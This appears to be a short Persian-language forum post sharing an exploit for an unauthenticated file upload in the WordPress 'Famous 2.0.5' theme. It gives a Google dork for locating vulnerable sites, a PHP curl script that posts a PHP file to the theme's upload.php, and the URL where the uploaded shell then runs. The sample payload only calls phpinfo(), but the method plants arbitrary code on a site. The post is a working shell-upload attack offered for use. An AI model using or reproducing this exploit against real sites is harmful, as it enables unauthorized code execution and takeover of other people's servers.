قدیمی ولی خوب
[align=LEFT]
[/align]
[align=LEFT]
کد:
WordPress Famous 2.0.5 Shell Upload Google Dork : inurl:/wp-content/themes/famous/ Exploit : PostShell.php <?php $uploadfile="lo.php"; $ch = curl_init("http://www.exemple.com/wordpress/wp-content/themes/famous/megaframe/megapanel/inc/upload.php?folder=/wordpress/wp-content/themes/famous/megaframe/megapanel/inc/&fileext=php"); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, array('Filedata'=>"@$uploadfile")); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $postResult = curl_exec($ch); curl_close($ch); print "$postResult"; ?> Shell Access : http://www.exemple.com/wordpress/wp-...nel/inc/lo.php lo.php <?php phpinfo(); ?>